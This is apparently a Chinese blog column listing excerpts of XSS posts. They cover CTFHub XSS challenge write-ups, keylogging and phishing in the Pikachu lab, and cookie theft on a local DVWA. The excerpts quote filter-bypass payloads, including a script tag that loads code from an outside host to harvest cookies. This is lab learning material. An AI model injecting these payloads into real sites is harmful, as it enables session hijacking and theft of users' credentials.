XSS跨站脚本攻击
xss知识分享
南暮思鸢
一名计算机学院学子
展开
-
CTFHUB技能树之XSS——过滤关键词
好吧,看起来过滤规则是写在后端代码,前端代码没有任何信息,不过后面了解到是对关键词“script”进行了过滤,刚好复制的代码是大小写的,所以可以直接绕过。看上去跟上一题应该差不多,应该只是添加多点过滤规则吧。居然这么快就过关了?原创 2024-10-21 17:20:50 · 293 阅读 · 0 评论 -
CTFHUB技能树之XSS——过滤空格
发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理。看上去是GET传参,有点像反射型的那题。原创 2024-10-21 17:06:50 · 341 阅读 · 0 评论 -
CTFHUB技能树之XSS——DOM跳转
"javascript:alert('xss')" 这样的代码赋值给 location.href 时,浏览器会将其解释为一种特殊的URL方案,即 “javascript:”。如果相等,就使用location.href将页面重定向到target[1],也就是参数值所指定的URL。jumpto=http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/),然后使用.split("=")将其拆分为参数名和参数值的数组。原创 2024-10-20 23:43:46 · 658 阅读 · 0 评论 -
CTFHUB技能树之XSS——存储型
发现地址栏中的URL没有GET传参,而且这次是“Hello,no name”原创 2024-10-19 21:06:11 · 395 阅读 · 0 评论 -
CTFHUB技能树之XSS——DOM反射
(这里还是用TLXSS平台的配置代码)直接指明是DOM反射型的XSS漏洞。可以看到存在xss漏洞。原创 2024-10-19 21:04:00 · 334 阅读 · 0 评论 -
CTFHUB技能树之XSS——反射型
在地址栏中可以看到有GET传参,正好对应第一个输入框的CTFHub,猜测是会通过第一个输入框来影响输出的内容(有个大大的“Hello,CTFHub”)出现“successfully”,第二个输入框应该是在后台访问注入的信息。(这里我就不新建了,之前新建过了)可以看到通过该输入,改变页面内容。(一般会有声音提醒上线了)原创 2024-10-19 19:18:43 · 712 阅读 · 0 评论 -
利用XSS漏洞获取键盘记录
(win11本机中开启phpstudy,让虚拟机win7进行访问,win7是受害者)若是想结束“键盘记录”就得删了存储记录或者初始化pikachu靶场。(当然,键盘记录也只是局限于xss存储型页面)原创 2024-09-05 16:05:16 · 564 阅读 · 0 评论 -
利用XSS漏洞钓鱼获取用户密码(一次失败的记录)
在锤子在线工具网站中的HTML在线运行中编写个简单的html网页,点击“示例源代码”再保留基础的代码,并在<body></body>间插入刚才复制的配置代码中的一个例子:<sCRiPt/SrC=//xs.pe/6b6></ScrIpT>因为是在线实时演示预期html网页结果的,所以刚插入好代码就可以听到“已上线”的语音提示,当然关掉网页就会听到“已下线”的语音。去后台的”钓鱼结果“中看一下,发现没有出现,奇怪了,按理说是会出现cookie记录的啊?(注意:这里需要自己添加一个</ScrIpT>)原创 2024-09-04 21:07:46 · 435 阅读 · 0 评论 -
XSS跨站脚本攻击概述
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;输出转义:根据输出点的位置对输出到前端的内容进行适当转义;3.DOM型XSS;原创 2024-09-03 15:30:35 · 145 阅读 · 0 评论 -
本地利用XSS获取cookie
呃,这种方法好像不行?后面本来想直接在火狐浏览器中修改cookie值的,但想起来火狐浏览器本来就存有cookie值,所以换成edge浏览器进行下一步操作了。hacker.php(用于生成用户访问而记录的cookie值的cookie.txt文件)修改完成之后直接访问http://127.0.0.1/DVWA/index.php。再退出登录,尝试直接添加cookie值,并访问index.php。hacker.js(用于引导用户访问hacker.php)创建hacker.php和hacker.js并放到。原创 2024-09-01 20:25:17 · 393 阅读 · 0 评论 -
Cookie和Session和Token的作用
浏览器之后的访问都会自动发送这个含有Session ID的cookie给B站服务器,直到cookie的有效期过了,浏览器一般会自行删除这个cookie,即回话结束。随着互联网的发展,用户也会越来越多,如果服务器依旧使用基于cookie的session,在特定时间有大量用户进行访问服务器,服务器就需要存储大量Session ID在数据库中,如果数据库奔溃了,又会影响服务器获取Session ID,在多种因素和需求的影响下,就诞生出了JWT(Json Web token)这一种技术。token存储在客户端。原创 2024-09-01 17:03:14 · 316 阅读 · 0 评论